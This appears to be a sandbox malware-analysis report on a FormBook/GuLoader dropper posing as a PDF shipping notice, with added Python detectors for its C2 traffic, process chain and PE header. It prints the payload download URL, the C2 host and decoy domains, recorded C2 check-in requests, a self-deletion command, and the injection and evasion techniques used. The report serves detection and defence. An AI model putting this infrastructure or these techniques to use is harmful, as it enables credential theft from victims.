
Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Sample Name:Arrival Notice, CIA Awb Inv Form.pdf.exe
Analysis ID:527894
MD5:ff71941571d8930c1125b3931d400d86
SHA1:0a417bf568a5978777021e433bf4693893facd3e
SHA256:bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64native
  • Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 4636 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)
    • Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)
      • explorer.exe (PID: 4672 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • NETSTAT.EXE (PID: 5904 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 3516 cmdline: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}

Threatname: FormBook

{"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
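
The C2 entry and the 64 decoy domains above are what drive the GET requests the Networking section records further down: every request uses the configured path /s3f1/, two query parameters (a long base64-like blob and a short token), Connection: close and no User-Agent, and only the Host header changes as the bot walks through the decoys. The Python below is an added example, not Joe Sandbox output or FormBook code: it parses raw HTTP requests and scores them against the extracted configuration. The request aimed at www.papllc.biz and the benign request are constructed (the sandbox run shows only decoy hosts), the decoy subset is taken from the list above, and the three-trait threshold is this example's own choice.

```python
"""Flag FormBook-style check-ins in captured HTTP requests using the extracted
configuration: the same GET (configured path, two query parameters, base64-like
blob, no User-Agent) goes to the real C2 and to every decoy domain in turn, so
the hostname alone is a weak indicator.

Added example, not Joe Sandbox or FormBook code. Requests #0 and #2 copy GETs
recorded in the report; #1 (to the real C2 host) and #3 (benign) are constructed.
"""
import re
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Subset of the configuration extracted above (C2 host+path and some decoys).
FORMBOOK_CONFIG = {
    "C2 list": ["www.papllc.biz/s3f1/"],
    "decoy": ["izivente.com", "musee-radix-hairsalon.com", "mvsteals.com",
              "teslafreesuperchargermiles.com", "celsb.com", "4mtechmachines.com",
              "hara.cloud"],
}
# A run of at least 40 base64-alphabet characters, as in the "0v=" parameter.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")

# Constructed requests (CRLF-terminated, headers only).
SAMPLE_REQUESTS = [
    "GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY"
    "&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1\r\nHost: www.izivente.com\r\nConnection: close\r\n\r\n",
    "GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy"
    "&hXeT=Wxlp HTTP/1.1\r\nHost: www.papllc.biz\r\nConnection: close\r\n\r\n",
    "GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6"
    "&hXeT=Wxlp HTTP/1.1\r\nHost: www.hara.cloud\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]


def norm_host(host: str) -> str:
    """Lower-case, drop a trailing dot and a leading 'www.' (FormBook adds it)."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def build_indicators(cfg: Dict[str, List[str]]) -> Tuple[Set[str], Dict[str, str]]:
    """Split 'host/path/' C2 entries into a path set and a host -> role map."""
    paths: Set[str] = set()
    roles: Dict[str, str] = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        roles[norm_host(host)] = "c2"
        paths.add("/" + path.strip("/") + "/")
    for decoy in cfg["decoy"]:
        roles.setdefault(norm_host(decoy), "decoy")
    return paths, roles


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, request-target, lower-cased header dict) from a raw request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw: str, cfg=FORMBOOK_CONFIG) -> Optional[Dict[str, object]]:
    """Return a verdict when at least three FormBook traits are present, else None."""
    paths, roles = build_indicators(cfg)
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    reasons: List[str] = []
    if url.path in paths:
        reasons.append("configured_c2_path")
    role = roles.get(norm_host(headers.get("host", "")))
    if role:
        reasons.append(f"host_in_config:{role}")
    if "user-agent" not in headers:
        reasons.append("no_user_agent")
    # Split the query by hand: parse_qsl would turn '+' into a space and
    # break the base64 check on the first parameter.
    params = [p.split("=", 1) for p in url.query.split("&") if p]
    if len(params) == 2 and len(params[0]) == 2 and B64_BLOB.match(params[0][1]):
        reasons.append("two_param_query_with_b64_blob")
    if method in ("GET", "POST") and len(reasons) >= 3:
        return {"host": headers.get("host"), "role": role or "unknown", "reasons": reasons}
    return None


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify(raw))
```

Alert on the path and request shape rather than the hostname: the real C2 is one host among 64 that receive identical requests, so blocking only the domains seen in one sandbox run achieves little. Matching the Host header against the configuration is still useful afterwards, to label which of the hits was the live server.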

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
    • 0x1c418:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
    • 0x1c410:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

    Sigma Overview

    System Summary:

    Sigma detected: Suspicious Double Extension
    Source: Process started; Author: Florian Roth (rule), @blu3_team (idea); Data: Command: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, NewProcessName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentProcessId: 4636, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe", ProcessId: 7132

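The Sigma hit above and the Process Tree describe one chain: a .pdf.exe lure, a second instance of the sample, code injected into explorer.exe, NETSTAT.EXE launched from that injected explorer.exe, and finally cmd.exe /c del removing the original file. The Python below is an added example, not Sigma or Joe Sandbox code, that runs those three checks over process-creation events. The events are constructed to mirror the tree (PIDs copied from it); the cmd.exe image path, the benign control event, the lure-extension list and the recon-tool set are this example's assumptions. In real endpoint telemetry explorer.exe's parent would not be the sample (the sandbox draws it that way to show the injection), which is why the self-deletion check matches the deleted path against every executed image in the batch instead of walking parent PIDs.

```python
"""Triage process-creation events for the chain the report ties together:
a lure with a double extension, explorer.exe launching a network tool after
being injected, and cmd.exe deleting the executable that started the chain.

Added example, not Joe Sandbox or Sigma code. Events are constructed to mirror
the report's process tree; the cmd.exe image path, the control event and the
extension/tool lists are assumptions of this example.
"""
import re
from typing import Any, Dict, List, Tuple

Event = Dict[str, Any]

# Lure extensions hidden behind ".exe" (idea of the Sigma rule; list is mine).
DOUBLE_EXT = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|rtf|txt|csv|jpe?g|png|gif)\.exe$", re.IGNORECASE)
# Recon tools explorer.exe itself has no reason to launch (assumption).
RECON_TOOLS = {"netstat.exe", "ipconfig.exe", "systeminfo.exe", "tasklist.exe"}
# "del [/flags] <path>" at the end of a cmd.exe command line, quoted or not.
DEL_CMD = re.compile(r'\bdel\b(?:\s+/\w+)*\s+"?([^"]+?)"?\s*$', re.IGNORECASE)

# Constructed events modelled on the report's tree (PIDs copied from it).
EVENTS: List[Event] = [
    {"pid": 4636, "ppid": 1000,
     "image": r"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"'},
    {"pid": 7132, "ppid": 4636,
     "image": r"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"'},
    {"pid": 4672, "ppid": 7132, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 5904, "ppid": 4672, "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "cmdline": r"C:\Windows\SysWOW64\NETSTAT.EXE"},
    {"pid": 3516, "ppid": 5904, "image": r"C:\Windows\SysWOW64\cmd.exe",  # path assumed
     "cmdline": r'/c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"'},
    # Control: netstat from an interactive shell whose parent is not recorded.
    {"pid": 6000, "ppid": 1000, "image": r"C:\Windows\System32\NETSTAT.EXE",
     "cmdline": r"C:\Windows\System32\NETSTAT.EXE -ano"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Event]) -> List[Tuple[int, str, Any]]:
    """Return (pid, finding, detail) tuples for the three behaviours."""
    by_pid = {e["pid"]: e for e in events}
    executed: Dict[str, List[int]] = {}
    for e in events:
        executed.setdefault(str(e["image"]).lower(), []).append(int(e["pid"]))

    findings: List[Tuple[int, str, Any]] = []
    for e in events:
        pid, name = int(e["pid"]), basename(str(e["image"]))
        if DOUBLE_EXT.search(name):
            findings.append((pid, "double_extension", e["image"]))
        parent = by_pid.get(e["ppid"])
        if parent and basename(str(parent["image"])) == "explorer.exe" and name in RECON_TOOLS:
            findings.append((pid, "explorer_spawns_recon_tool", name))
        if name == "cmd.exe":
            m = DEL_CMD.search(str(e["cmdline"]))
            target = m.group(1).lower() if m else None
            if target in executed:
                # The deleted file ran in this batch: the chain is erasing itself.
                findings.append((pid, "deletes_executed_image",
                                 tuple(sorted(executed[target]))))
    return findings


if __name__ == "__main__":
    for pid, kind, detail in triage(EVENTS):
        print(f"PID {pid}: {kind} -> {detail}")
```

The explorer.exe check is the noisiest of the three on a busy estate, since a user can launch a console tool from a shortcut; combining it with the other two findings on the same host within a short window is what makes the chain convincing.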
    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
    Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}
    Multi AV Scanner detection for submitted file
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Virustotal: Detection: 37%
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, ReversingLabs: Detection: 31%
    Yara detected FormBook
    Source: Yara match, File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknown, HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2
    Source: Binary string: netstat.pdbGCTL; source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: netstat.pdb; source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP; source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb; source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 8_2_0281731A

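The static PE line above lists the COFF file-header Characteristics bits set on the sample. The Python below is an added example, not Joe Sandbox code: it reads those bits from raw PE bytes and names them, so the same check can be run on whatever gets dumped from the injected explorer.exe or NETSTAT.EXE later. The stub header it builds is constructed to carry the same five flags and is not the sample's header. RELOCS_STRIPPED on a 32-bit EXE is worth noticing: with no base relocations the loader cannot rebase the image, so it can only run at its preferred ImageBase.

```python
"""Decode the COFF file-header Characteristics the report lists for the sample
(LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED,
RELOCS_STRIPPED) from PE bytes.

Added example, not Joe Sandbox code. The stub header built below is constructed
to carry those five flags; it is not the sample's header.
"""
import struct
from typing import Dict, List, Tuple

# IMAGE_FILE_* characteristics bits as defined in winnt.h.
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0010: "AGGRESSIVE_WS_TRIM", 0x0020: "LARGE_ADDRESS_AWARE",
    0x0080: "BYTES_REVERSED_LO", 0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED",
    0x0400: "REMOVABLE_RUN_FROM_SWAP", 0x0800: "NET_RUN_FROM_SWAP", 0x1000: "SYSTEM",
    0x2000: "DLL", 0x4000: "UP_SYSTEM_ONLY", 0x8000: "BYTES_REVERSED_HI",
}
MACHINES = {0x014C: "I386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_HEADER = "<HHIIIHH"


def file_header(data: bytes) -> Tuple[int, int]:
    """Return (Machine, Characteristics), validating the MZ and PE signatures."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 + struct.calcsize(COFF_HEADER) > len(data):
        raise ValueError("e_lfanew points past end of data")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, *_rest, characteristics = struct.unpack_from(COFF_HEADER, data, e_lfanew + 4)
    return machine, characteristics


def decode_characteristics(value: int) -> List[str]:
    """Name every set bit, flagging any bit winnt.h does not define."""
    names = [name for bit, name in sorted(CHARACTERISTICS.items()) if value & bit]
    unknown = value & ~sum(CHARACTERISTICS) & 0xFFFF
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:04X}")
    return names


def describe(data: bytes) -> Dict[str, object]:
    machine, characteristics = file_header(data)
    flags = decode_characteristics(characteristics)
    notes = []
    if machine == 0x014C:
        notes.append("32-bit x86 image")
    if "RELOCS_STRIPPED" in flags:
        # No .reloc data: the loader cannot move the image from its preferred
        # ImageBase, whatever the ASLR settings say.
        notes.append("no base relocations: not rebasable by the loader")
    return {"machine": MACHINES.get(machine, f"0x{machine:04X}"),
            "characteristics": flags, "notes": notes}


def build_stub(machine: int = 0x014C, characteristics: int = 0x010F) -> bytes:
    """Constructed MZ + PE + COFF header with the given flags (no sections)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after DOS header
    coff = struct.pack(COFF_HEADER, machine, 1, 0, 0, 0, 0xE0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    print(describe(build_stub()))
```

Run against a real file with describe(open(path, "rb").read()); the names come out in bit order, so they match the report's list up to ordering.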
    Networking:

    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exe, Network Connect: 154.94.229.8 80
    Source: C:\Windows\explorer.exe, Network Connect: 107.178.157.225 80
    Source: C:\Windows\explorer.exe, Network Connect: 3.64.163.50 80
    Source: C:\Windows\explorer.exe, Network Connect: 35.198.112.85 80
    Source: C:\Windows\explorer.exe, Network Connect: 70.40.220.123 80
    Source: C:\Windows\explorer.exe, Network Connect: 183.181.99.12 80
    Source: C:\Windows\explorer.exe, Network Connect: 184.168.98.97 80
    Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
    Source: C:\Windows\explorer.exe, Network Connect: 64.190.62.111 80
    Uses netstat to query active network connections and open ports
    Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor, URLs: https://drive.google.com/uc?export=download&id=16igyruBe
    Source: Malware configuration extractor, URLs: www.papllc.biz/s3f1/
    Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox View, ASN Name: ROOTNETWORKSUS
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.izivente.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.musee-radix-hairsalon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.teslafreesuperchargermiles.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
    Source: global traffic, HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1 | Host: www.mvsteals.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, not printable)
